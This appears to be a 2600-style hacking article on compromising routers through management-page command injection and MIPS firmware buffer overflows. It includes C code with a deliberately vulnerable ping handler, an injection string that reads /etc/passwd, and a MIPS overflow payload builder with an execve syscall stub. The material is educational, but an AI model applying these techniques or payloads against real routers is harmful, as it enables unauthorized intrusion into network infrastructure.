How to Hack a Router Device Like NSA Employees

by Duran

The importance of routers for networks is self-evident.

Whoever dominates a routing node controls the flow of data through it.  From a technical point of view, the leaked NSA XKEYSCORE documents list gaining control of routing nodes among that program's missions; in a nutshell, hacking router devices.

This article covers the technical points of router hacking without going into every detail.  Everything involved is freely documented on the Internet, and if a particular point interests you, open sources will have the answer.

How to Find a Router Device

You can locate active routers on the Internet with commands such as traceroute (Linux), tracert (Windows), or Nmap's --traceroute option.  You can also use ready-made search engines such as Shodan to find a specific target.  And if you are in the field and the target has Wi-Fi, the CIA's CHERRYBLOSSOM tooling (see the WikiLeaks publication) comes in handy.

How to Hack It

Once the target is identified, the next step is to manipulate it by whatever means work.  Many real cases show that the strongest fortress is broken from the inside, and the method we see most often is spear phishing.  Once you hold one machine in a LAN, you can use it as a jump box to take over other network devices, including intranet routers.  This article is not going to cover that attack chain.  Instead: if a router is exposed on the public network, how do we capture it?  Let's see how to gain control of the router.

Management Page Exploit Method - This avenue usually exists because the administrator left the router's management interface reachable from the public network (the fix is to turn off WAN-side remote management; turning on the router's SPI firewall helps as well).  The attacker then has full access to the web management interface (typically CGI or PHP pages) and can hunt for vulnerabilities in it: Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), and, most usefully, command injection.  Most of the serious bugs come from handlers that pass unfiltered input straight into a shell command, which yields arbitrary command execution; XSS and CSRF are valuable mainly for reaching such a handler with the administrator's session.
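As an added illustration (my code, not the article's and not from any particular router vendor), here is the shape of the command-injection bug just described, with a hardened version beside it.  The "ping" diagnostic handler, its parameter, and the attacker input are all constructed for the example.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Deliberately vulnerable (illustration, assumed diagnostic-page handler):
 * the "host" form field is pasted into a shell command line, so a value
 * such as "192.0.2.1; cat /etc/passwd" runs an attacker-chosen command. */
const char *build_ping_cmd_vuln(const char *host)
{
    static char cmd[256];
    snprintf(cmd, sizeof cmd, "ping -c 4 %s", host);
    return cmd;             /* the real CGI would hand this to system() */
}

/* Hardened input check: only what can appear in a hostname or IPv4 literal.
 * Every shell metacharacter (; | & ` $ ( ) < > newline, space) is rejected,
 * and a leading '-' is refused so the value cannot become a ping option. */
int is_safe_host(const char *host)
{
    size_t len = strlen(host);
    if (len == 0 || len > 253 || host[0] == '-')
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)host[i];
        if (!isalnum(c) && c != '.' && c != '-')
            return 0;
    }
    return 1;
}

/* Hardened handler: validate, then build an argv vector for execv() instead
 * of a command line for system(), so no shell ever parses the input.
 * Returns argc, or -1 when the host is rejected or the vector is too small. */
int ping_argv_safe(const char *host, const char *argv[], size_t cap)
{
    if (cap < 5 || !is_safe_host(host))
        return -1;
    argv[0] = "ping";
    argv[1] = "-c";
    argv[2] = "4";
    argv[3] = host;
    argv[4] = NULL;
    return 4;
}

/* Convenience wrapper: 1 if the host would be passed to execv(), else 0. */
int ping_host_accepted(const char *host)
{
    const char *argv[5];
    return ping_argv_safe(host, argv, 5) == 4;
}

int main(void)
{
    /* Constructed inputs: a benign host and an injection attempt. */
    const char *good = "192.0.2.1";
    const char *evil = "192.0.2.1; cat /etc/passwd";

    printf("vulnerable command line: %s\n", build_ping_cmd_vuln(evil));
    printf("hardened accepts good host: %d\n", ping_host_accepted(good));
    printf("hardened accepts injection: %d\n", ping_host_accepted(evil));
    return 0;
}
```

The point of the hardened version is not the character filter alone but the switch from a shell command line to an argv vector: even if the filter had a gap, there is no shell left to interpret metacharacters, and the leading-dash check closes the remaining option-injection path.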

Firmware Exploit Method - This is the method to emphasize.  When you have penetrated an intranet and found a router, you face a privilege escalation problem: gaining root on the device itself (not merely the admin credential, which a sniffer can capture).  This is what NSA's hackers would do.

The steps for digging a vulnerability out of a router's firmware are as follows:

First, get the router's firmware.  You can download it from the manufacturer's website or dump it from the router's flash chip; the latter requires hardware familiarity and good hands-on skills.  Once you have the firmware image, use a firmware analysis tool such as Binwalk to carve out and extract the embedded file system (commonly SquashFS).

Second, analyze the code and write an exploit.  You need to know how to find software vulnerabilities and write exploit code; if you don't, there are many tutorials on the Internet to learn from.  But realize that most routers are MIPS (or ARM) rather than x86, so you must be able to read MIPS assembly.  You also need to understand how the MIPS calling convention and stack frame differ from x86 so that you can construct a buffer overflow correctly, and you have to watch endianness, since MIPS routers ship in both big-endian and little-endian variants.  Still, if you have mastered exploit development on x86, the theory carries over to MIPS almost unchanged; you just have to pay attention to what changes.

For example, on x86 you invoke a Linux system call with int $0x80, but on MIPS you load the call number into $v0 and use the syscall instruction.  You can pick ready-made payloads from the Shellcodes Database for Study Cases and then write the exploit in Python.  Talk is cheap: visit RouterPWN for more material to practice on.

Third, build a testing environment.  You need a Linux host for this work, and QEMU to emulate the router's CPU so you can run programs from the extracted file system.  Besides IDA Pro for disassembly and debugging (get the MIPS helper plugins from github.com/tacnetsol/ida), you will want fuzzers such as Sulley and SPIKE, Burp Suite for the web interface, and Wireshark for capturing network traffic.

QEMU and IDA together let you debug the program locally or remotely.  Just don't forget to set the processor type to MIPS in IDA's debugger setup.
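As an added worked example (mine, not the article's, and not a real exploit for any router), here is the endianness and NUL-byte bookkeeping that the second step above turns on, written in C so it compiles on the Linux host you build for the third step.  The overflow offset, the return address, and the two-instruction stand-in for shellcode are constructed values for illustration.  Two MIPS facts the example leans on: the return address lives in $ra and is spilled to the stack only by non-leaf functions, so the overwrite target is a caller's saved $ra rather than a slot every function has; and the Linux o32 ABI puts the system-call number in $v0 (4000 + n, so execve is 4011) before the syscall instruction.  Because strcpy-style copies stop at the first NUL, the builder refuses any address or instruction whose encoding contains 0x00, which is why real MIPS shellcode writes syscall 0x40404 instead of a bare syscall.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Write a 32-bit value in the target's byte order (mips = big, mipsel = little). */
void put_u32(uint8_t *out, uint32_t v, int big_endian)
{
    for (int i = 0; i < 4; i++) {
        int shift = big_endian ? 8 * (3 - i) : 8 * i;
        out[i] = (uint8_t)(v >> shift);
    }
}

/* Read it back the same way; handy when checking a captured packet in Wireshark. */
uint32_t get_u32(const uint8_t *p, int big_endian)
{
    uint32_t v = 0;
    for (int i = 0; i < 4; i++) {
        int shift = big_endian ? 8 * (3 - i) : 8 * i;
        v |= (uint32_t)p[i] << shift;
    }
    return v;
}

/* 1 if any byte in p[0..n) is NUL; a strcpy()/sprintf() copy would stop there. */
int has_nul(const uint8_t *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0) return 1;
    return 0;
}

/* MIPS I-type: addiu rt, rs, imm (opcode 9). "li $v0, 4011" assembles to
 * addiu $v0, $zero, 4011 = 0x24020FAB. Register numbers: $zero=0, $v0=2. */
uint32_t mips_addiu(unsigned rt, unsigned rs, uint16_t imm)
{
    return (9u << 26) | ((rs & 31u) << 21) | ((rt & 31u) << 16) | imm;
}

/* MIPS syscall: SPECIAL opcode, function 0x0C, 20-bit code field in bits 6..25.
 * A bare "syscall" is 0x0000000C, full of NULs; "syscall 0x40404" is 0x0101010C. */
uint32_t mips_syscall(uint32_t code)
{
    return ((code & 0xFFFFFu) << 6) | 0x0Cu;
}

/* Emit the last two instructions of an execve payload in target byte order:
 * li $v0, 4011 ; syscall 0x40404. A real payload sets up $a0..$a2 first;
 * this is only the part the endianness and NUL points need. Returns bytes written. */
size_t encode_syscall_stub(uint8_t *out, int big_endian)
{
    put_u32(out,     mips_addiu(2, 0, 4011), big_endian);
    put_u32(out + 4, mips_syscall(0x40404),  big_endian);
    return 8;
}

/* Build [filler x ra_offset][saved $ra overwrite][payload]. Returns total length,
 * or -1 if it would not survive a NUL-terminated copy or does not fit in cap. */
int build_overflow_payload(uint8_t *out, size_t cap, size_t ra_offset,
                           uint32_t ret_addr, int big_endian,
                           const uint8_t *payload, size_t payload_len)
{
    size_t total = ra_offset + 4 + payload_len;
    if (total > cap) return -1;
    memset(out, 'A', ra_offset);
    put_u32(out + ra_offset, ret_addr, big_endian);
    memcpy(out + ra_offset + 4, payload, payload_len);
    return has_nul(out, total) ? -1 : (int)total;
}

int main(void)
{
    uint8_t stub[8], buf[128];
    /* Constructed: 64 bytes to the saved $ra, big-endian target, assumed address. */
    size_t n = encode_syscall_stub(stub, 1);
    int len = build_overflow_payload(buf, sizeof buf, 64, 0x2AB3F4C0u, 1, stub, n);
    printf("payload length %d, bytes at offset 64: %02X %02X %02X %02X\n",
           len, buf[64], buf[65], buf[66], buf[67]);
    /* An address with a zero byte is rejected rather than silently truncated. */
    printf("NUL-containing address rejected: %d\n",
           build_overflow_payload(buf, sizeof buf, 64, 0x2AB30000u, 1, stub, n) == -1);
    return 0;
}
```

One more MIPS caveat worth remembering when the payload lands but nothing runs: the bytes you just wrote to the stack may still sit in the data cache while the instruction fetch reads stale memory, so MIPS exploits commonly return into a function such as sleep() first to force the caches into sync before jumping to the shellcode.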

Summary

This article only describes the general idea of router hacking.  Once you have the skills to break firmware code, you can do much more with router security.  For instance, the backdoor exposed across a whole series of Netcore router products in 2014 was not a buffer overflow but a hard-coded credential on an undocumented service, and it was found by reversing the firmware.

In fact, NSA hackers spend their days on exactly this tedious but exciting work, because, as we all know, "Vulnerability is King."

Return to $2600 Index